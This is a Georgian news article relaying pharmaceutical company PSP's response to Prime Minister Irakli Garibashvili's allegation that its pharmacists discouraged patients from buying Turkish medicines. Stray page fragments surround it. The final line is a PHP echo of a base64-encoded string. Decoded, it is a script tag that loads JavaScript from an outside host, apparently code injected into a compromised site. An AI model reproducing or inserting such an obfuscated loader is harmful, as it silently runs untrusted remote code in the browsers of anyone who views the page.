celsiusi
ავერსი საქკაბელი

ფარმაცევტული კომპანია PSP-ს მენეჯმენტი სპეციალურ განცხადებას ავრცელებს, რომელსაც საინფორმაციო სააგენტო BUSINESS TIME უცვლელად გთავაზობთ.

"დღეს მთავრობის სხდომაზე პრემიერ-მინისტრმა განცხადება გააკეთა თურქული მედიკამენტების მიმოქცევასთან დაკავშირებით. პრემიერ-მინისტრს გადაუმოწმებელი ინფორმაცია მიაწოდეს. ფარმაცევტული სექტორი თურქული წარმოების იაფიანი მედიკამენტების პროექტში მომზადების ეტაპზევე ჩაერთო და დღეს PSP არის თურქული მედიკამენტების ერთ-ერთი მსხვილი დისტრიბუტორი საქართველოში. PSP-სთვის მომხმარებლის ინტერესი უპირველესია და შესაბამისად, ჩვენი ფარმაცევტები მომხმარებელს ყოველთვის ექიმის დანიშნულების მიხედვით ემსახურებიან.
ბატონმა პრემიერმა განაცხადა, რომ ინფორმაცია აუცილებლად უნდა გადამოწმდეს. იმედს ვიტოვებთ, ეს უახლოეს მომავალში მოხდება და საზოგადოება ინფორმირებული იქნება", - ნათქვამია კომპანიის განცხადებაში. 
შეგახსენებთ, რომ ირაკლი ღარიბაშვილმა დღეს განაცხადა, ფარმაცევტულ კომპანია PSP-ში თურქულ მედიკამენტებთან დაკავშირებით, სავარაუდოდ, პაციენტების შეცდომაში შეყვანას ჰქონდა ადგილი. ღარიბაშვილი ამბობს, რომ ფარმაცევტები მოქალაქეებს ეუბნებიან, რომ თურქული მედიკამენტები კარგი არ არის. პრემიერმა იქვე თქვა, რომ ინფორმაცია უნდა გადამოწმდეს, თუმცა დასძინა, რომ დადასტურების შემთხვევაში, უმკაცრესი რეაგირება იქნება. 
307
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");